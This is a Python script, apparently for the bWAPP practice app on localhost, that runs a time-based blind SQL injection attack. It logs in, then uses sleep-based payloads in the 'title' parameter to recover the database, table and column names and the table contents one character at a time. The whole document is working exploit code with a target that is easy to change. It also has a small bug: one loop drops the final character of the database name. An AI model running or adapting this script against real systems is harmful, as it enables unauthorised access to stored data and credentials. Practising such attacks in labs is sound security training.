SQL盲注脚本

#coding:utf-8
import requests
import time

ip_port="127.0.0.1:80"
data={
    "login":"bee",
    "password":"bug",
    "security_level":"0",
    "form":"submit"
}
urlLogin="http://%s/login.php"%ip_port
session=requests.session()
resp=session.post(urlLogin,data)
num=0

#获取数据库名长度
def get_length_of_database():
    i=1
    while True:
        url="http://%s/sqli_15.php?title=World War Z' and length(database())=%d and sleep(1) -- &action=search"%(ip_port,i)
        startTime=time.time()
        rsq=session.get(url)
        endTime=time.time()
        ga=endTime-startTime
        if ga>1:
            return i
        i=i+1

#获取数据库名字
def get_name_of_database():
    length_of_database=get_length_of_database()
    name_of_database=""
    for j in range(1,length_of_database):
        for k in range(33,128):
            url="http://%s/sqli_15.php?title=World War Z' and ascii(substr(database(),%d,1))=%d and sleep(1) -- &action=search"%(ip_port,j,k)
            startTime=time.time()
            rsq=session.get(url)
            endTime=time.time()
            ga=endTime-startTime
            if ga>1:
                name_of_database+=chr(k)
                break
    return name_of_database

#获取指定库中表的数量
def get_count_of_tables():
    i=1
    while True:
        url="http://%s/sqli_15.php?title=World War Z' and (select count(*) from information_schema.tables where table_schema=database())=%d and sleep(1) -- &action=search"%(ip_port,i)
        startTime=time.time()
        rsq=session.get(url)
        endTime=time.time()
        ga=endTime-startTime
        if ga>1:
            return i
        i=i+1

#获取指定库所有表的表名长度的列表
def get_length_list_of_tables():
    count_of_tables=get_count_of_tables()
    length_list=[]
    for i in range(0,count_of_tables):
        j=1
        while True:
            url="http://%s/sqli_15.php?title=World War Z' and  (select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,i,j)
            startTime=time.time()
            rsq=session.get(url)
            endTime=time.time()
            ga=endTime-startTime
            if ga>1:
                length_list.append(j)
                break
            j=j+1
    return length_list

#获取指定库中的所有表名列表
def get_tables():
    count_of_tables=get_count_of_tables()
    length_list=get_length_list_of_tables()
    name_of_tables=[]
    for i in range(0,count_of_tables):
        name=""
        for j in range(0,length_list[i]):
            for k in range(33,128):
                url="http://%s/sqli_15.php?title=World War Z' and  (select ascii(substr((table_name),%d,1)) from information_schema.tables where table_schema=database() limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,j+1,i,k)
                startTime=time.time()
                rsq=session.get(url)
                endTime=time.time()
                ga=endTime-startTime
                if ga>1:
                    name+=chr(k)
                    break
        name_of_tables.append(name)
    return name_of_tables

#获取指定表中列的数量
def get_count_of_columns(name_of_table):
    i=1
    while True:
        url="http://%s/sqli_15.php?title=World War Z' and (select count(*) from information_schema.columns where table_schema=database() and table_name=\"%s\")=%d and sleep(1) -- &action=search"%(ip_port,name_of_table,i)
        startTime=time.time()
        rsq=session.get(url)
        endTime=time.time()
        ga=endTime-startTime
        if ga>1:
            return i
        i+=1

#获取指定表所有列的列名长度
def get_length_list_of_columns(name_of_table):
    count_of_columns=get_count_of_columns(name_of_table)
    length_list=[]
    for i in range(0,count_of_columns):
        j=1
        while True:
            url="http://%s/sqli_15.php?title=World War Z' and (select length(column_name) from information_schema.columns where table_schema=database() and table_name=\"%s\" limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,name_of_table,i,j)
            startTime=time.time()
            rsq=session.get(url)
            endTime=time.time()
            ga=endTime-startTime
            if ga>1:
                length_list.append(j)
                break
            j=j+1
    return length_list

#获取指定表的所有列的列名
def get_columns(name_of_table):
    count_of_columns=get_count_of_columns(name_of_table)
    length_list=get_length_list_of_columns(name_of_table)
    columns=[]
    for i in range(0,count_of_columns):
        name=""
        for j in range(0,length_list[i]):
            for k in range(33,128):
                url="http://%s/sqli_15.php?title=World War Z' and  (select ascii(substr((column_name),%d,1)) from information_schema.columns where table_schema=database() and table_name=\"%s\" limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,j+1,name_of_table,i,k)
                startTime=time.time()
                rsq=session.get(url)
                endTime=time.time()
                ga=endTime-startTime
                if ga>1:
                    name+=chr(k)
                    break
        columns.append(name)
    return columns

#获取指定表指定列名数据个数
def get_count_of_datas(name_of_table,name_of_column):
    i=1
    while True:
        url="http://%s/sqli_15.php?title=World War Z' and (select count(%s) from %s)=%d and sleep(1) -- &action=search"%(ip_port,name_of_column,name_of_table,i)
        startTime=time.time()
        rsq=session.get(url)
        endTime=time.time()
        ga=endTime-startTime
        if ga>1:
            return i
        i+=1

#获取指定表指定列名数据长度列表
def get_length_list_of_datas(name_of_table,name_of_column):
    count_of_datas=get_count_of_datas(name_of_table,name_of_column)
    length_list=[]
    for i in range(0,count_of_datas):
        j=1
        while True:
            url="http://%s/sqli_15.php?title=World War Z' and (select length(%s) from %s limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,name_of_column,name_of_table,i,j)
            startTime=time.time()
            rsq=session.get(url)
            endTime=time.time()
            ga=endTime-startTime
            if ga>1:
                length_list.append(j)
                break
            j+=1
    return length_list

#爆破数据
def get_datas(name_of_table,name_of_column):
    count_of_datas=get_count_of_datas(name_of_table,name_of_column)
    length_list=get_length_list_of_datas(name_of_table,name_of_column)
    datas=[]
    for i in range(count_of_datas):
        data=""
        for j in range(length_list[i]):
            for k in range(33,128):
                url="http://%s/sqli_15.php?title=World War Z' and (select ascii(substr((%s),%d,1)) from %s limit %d,1)=%d and sleep(1) -- &action=search"%(ip_port,name_of_column,j+1,name_of_table,i,k)
                startTime=time.time()
                rsq=session.get(url)
                endTime=time.time()
                ga=endTime-startTime
                if ga>1:
                    data+=chr(k)
                    break
        datas.append(data)
    return datas

def main():
    print("Judging the database...")
    print()
    print("Getting the table name...")
    tables=get_tables()
    for i in tables:
        print ("[+]%s"%(i))
    print("The table names in this database are:%s"%(tables))
    table=input("Select the Table name:")
    if table not in tables:
        print("Error!")
        exit()
    print()
    print("Getting the column names in the %s table......"%(table))
    columns=get_columns(table)
    for i in columns:
        print("[+]%s"%(i))
    print("The column name in %s are:%s"%(table,columns))
    column=input("Select the Column name:")
    if column not in columns:
        print("Error!")
        exit()
    print()
    print("Getting the datas......")
    datas=get_datas(table,column)
    for i in datas:
        print("[+]%s"%(i))

if __name__=='__main__':
    main()